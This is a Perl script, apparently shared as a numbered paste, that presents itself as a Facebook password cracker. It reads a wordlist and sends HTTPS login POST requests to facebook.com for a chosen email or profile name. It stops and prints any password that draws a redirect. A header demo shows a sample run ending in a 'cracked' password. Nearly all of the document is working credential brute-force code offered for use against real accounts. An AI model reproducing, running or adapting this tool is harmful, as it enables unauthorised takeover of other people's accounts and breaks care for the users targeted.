fbV1.5.9

1. #!/usr/bin/perl
2. #
3. # Tool: Imad'Ox Bruter
4. # Author: Imad'Ox Hunter
5. # Contact: [email protected]
6. # Code date: 17 April 2013
7. #
8. #
9. # Description:
10. # Imad'Ox Cracker is a password cracking tool written in perl to perform a dictionary-based attack on a specific Facebook user through HTTPS.
11. #
12. # Usage:
13. # perl Imad'Ox-Bruter.pl login wordlist
14. # login could be either a user's email address or profile name
15. #
16. # Module Requirements:
17. #
18. # Install module if missing:
19. # perl -MCPAN -e 'install Net::SSLeay'
20. #
21. # Demo:
22. # perl Imad'Ox-Bruter.pl [email protected] wordlist.lst
23. #
24. # --- Imad'Ox-Bruter Facebook password cracking tool
25. # --- By Imad'Ox Hunter
26. # --- www.facebook.com/imad.elouajib
27. #
28. # [+] Cracking [email protected] ...
29. #
30. # [-] test -> Failed
31. # [-] test123 -> Failed
32. # [-] testtest -> Failed
33. # [-] testest123 -> Failed
34. # [-] qwerty -> Failed
35. # [-] azerty -> Failed
36. # [-] password -> Failed
37. # [-] password123 -> Failed
38. #
39. ########################################################
40. # [+] CRACKED! Your password is P@$$W0RD
41. ########################################################
42. #
43. use strict;
44. use Net::SSLeay::Handle;
45. if(!defined($ARGV[0] && $ARGV[1])) {
46. system('clear');
47. print "\n+++ Imad'Ox-Bruter Facebook password Bruter\n";
48. print "+++ Coded by Imad'Ox-Hunter\n";
49. print "+++ www.fb.com/imad.elouajib\n\n";
50. print "+++ Usage: perl $0 login wordlist\n\n";
51. exit; }
52. my $user = $ARGV[0];
53. my $wordlist = $ARGV[1];
54. open (LIST, $wordlist) || die "\n[-] No Wordlist On $wordlist -_- \n";
55. print "\n+++ Imad'Ox-Bruter Facebook password Bruter\n";
56. print "+++ Coded by Imad'Ox-Hunter\n";
57. print "+++ www.fb.com/imad.elouajib\n";
58. print "\n[+] Now Cracking $user ...\n\n";
59. while (my $password = <LIST>) {
60. chomp ($password);
61. $password =~ s/([^^A-Za-z0-9\-_.!~*'()])/ sprintf "%%%0x", ord $1 /eg;
62. my $a = "POST /login.php HTTP/1.1";
63. my $b = "Host: www.facebook.com";
64. my $c = "Connection: close";
65. my $e = "Cache-Control: max-age=0";
66. my $f = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
67. my $g = "Origin: https://www.facebook.com";
68. my $h = "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31";
69. my $i = "Content-Type: application/x-www-form-urlencoded";
70. my $j = "Accept-Encoding: gzip,deflate,sdch";
71. my $k = "Accept-Language: en-US,en;q=0.8";
72. my $l = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3";
73. my $cookie = "cookie: datr=80ZzUfKqDOjwL8pauwqMjHTa";
74. my $post = "lsd=AVpD2t1f&display=&enable_profile_selector=&legacy_return=1&next=&profile_selector_ids=&trynum=1&timezone=300&lgnrnd=031110_Euoh&lgnjs=1366193470&email=$user&pass=$password&default_persistent=0&login=Log+In";
75. my $cl = length($post);
76. my $d = "Content-Length: $cl";
77. my ($host, $port) = ("www.facebook.com", 443);
78. tie(*SSL, "Net::SSLeay::Handle", $host, $port);
79. print SSL "$a\n";
80. print SSL "$b\n";
81. print SSL "$c\n";
82. print SSL "$d\n";
83. print SSL "$e\n";
84. print SSL "$f\n";
85. print SSL "$g\n";
86. print SSL "$h\n";
87. print SSL "$i\n";
88. print SSL "$j\n";
89. print SSL "$k\n";
90. print SSL "$l\n";
91. print SSL "$cookie\n\n";
92. print SSL "$post\n";
93. my $success;
94. while(my $result = <SSL>){
95. if($result =~ /Location(.*?)/){
96. $success = $1;
97. }
98. }
99. if (!defined $success)
100. {
101. print "[-] $password -> Not Him :( \n";
102. close SSL;
103. }
104. else
105. {
106. print "\n########################################################\n";
107. print "[+] Yuuup!! Pass Cracked => Pass is $password :D\n";
108. print "########################################################\n\n";
109. close SSL;
110. exit;
111. }
112. }